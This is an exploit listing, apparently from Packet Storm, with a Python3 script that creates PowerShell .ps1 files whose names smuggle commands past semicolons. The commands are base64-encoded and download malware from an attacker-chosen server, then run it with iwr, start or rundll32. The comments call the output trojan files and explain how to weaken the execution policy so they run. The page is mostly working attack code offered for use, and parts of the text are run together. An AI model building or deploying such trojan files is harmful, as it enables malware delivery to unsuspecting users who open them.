

Microsoft Windows PowerShell Remote Command Execution

This python script mints a .ps1 file with an exploitable semicolon condition that allows for command execution from Microsoft Windows PowerShell. This is an updated exploit to work with Python3.

Packet Storm
from base64 import b64encodeimport argparse,sys, hyp3rlinx (c) Video: vulnerable Windows .PS1 (PowerShell) files with specially crafted exploitable names.#Example:#Test;POweRsHeLL -e [BASE64 PAYLOAD];.ps1#Testing;saps (gc -)PoC;.ps1##Updated for Python3 from my orginal 2019 script with added DLL support and fixes.#Creates malicious ".ps1" PowerShell files with embedded trojan filename commands.#Download, save and execute malware (EXE,DLL) all from within a PowerShell Filename.#Expects hostname/ip-address of web-server housing an executable.##Vectors:#Double-click, drag and drop to a PowerShell shortcut, command line.##Requirements:#=============#1) .PS1 files set to open and run with PowerShell as the default program #2) Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass -Force##By hyp3rlinx - apparitionSec#===========================================================================================BANNER="""   _ \    ___| __ __|           _)                ____| _)  |         |   | \___ \    |   __|  _ \   |   _` |  __ \   |      |  |   _ \   ___/        |   |  |    (   |  |  (   |  |   |  __|    |  |   __/  _|     _____/   _| _|   \___/   | \__,_| _|  _| _|     _| _| \___|                              ___/                                                      By hyp3rlinx                                                    (C) circa 2023"""#Console colorsRED="\033[1;31;40m"GREY="\033[1;30;40m"CYAN="\033[1;36;40m"YELLOW="\033[1;33;40m"ENDC = '\033[m' #Defaultdef parse_args():    parser.add_argument("-i", "--ipaddress", help="Remote server hosting a Malware.")    parser.add_argument("-m", "--local_malware_name", help="Name of the Malware on disk after download.")    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")    parser.add_argument("-t", "--type", help="Executable type EXE or DLL (required)")    parser.add_argument("-f", "--from_file", nargs="?", const="1", help="Execute commands from a local text-file named '-' (dash).")    parser.add_argument("-u", "--usage", nargs="?", const="1", help="Usage examples.")    return parser.parse_args()def show_usage():    print(RED+BANNER+ENDC)    print(CYAN+"[+] "+GREY+" -i -m hate.exe -r 1.exe  -t exe")    print(CYAN+"[+] "+GREY+" -i x.x.x.x -m q.z -r s.dll -t dll"+ENDC)    def main(args):    PSEmbedFilenameMalwr=""    if args.usage:        show_usage()        return    if args.from_file: #Create PS1 file that executes code from a text-file using saps gc (get-content).        if create_file("",1):            success(1)    if args.ipaddress:        if not args.type:            show_usage()            print(YELLOW+"[!] "+GREY+"Provide the executable type DLL or EXE"+ENDC)            exit(1)        if args.type=="exe": #EXE saved to current dir where the vuln PS script is run.            PSEmbedFilenameMalwr = "iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O "+args.local_malware_name+";sleep -s 2;start "+args.local_malware_name        else: #DLL saved to users downloads directory.            PSEmbedFilenameMalwr = "saps "+"http://"+args.ipaddress+"/"+args.remote_malware_name+";sleep -s2;rundll32 $HOME/Downloads/"+args.local_malware_name+", 0"    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE')).decode()def success(obj):    print(RED+BANNER+ENDC)    print(GREY+"[+] PS1 Trojan File Created!")    if obj==1:        print(GREY+"[+] Added 'calc.exe' command to created file named '-' (dash)"+ENDC)def create_file(payload, local):    if local==1:        f=open("Testing;saps (gc -)PoC;.ps1", "w")        f2=open("-", "w")        f2.write("calc.exe")        f2.close()    else:        f=open("Test;PoWeRShell -e "+payload+";2.ps1", "w")    f.write("Write-Output 'Have a nice day GG!'")    f.close()    return Trueif __name__=="__main__":    os.system("color")    parser = argparse.ArgumentParser()    PSCmds = main(parse_args())    if len(sys.argv)==1:        print(RED+BANNER+GREY)        parser.print_help(sys.stderr)        print(ENDC)        sys.exit(1)    if PSCmds:        if create_file(PSCmds,0):            success(0)

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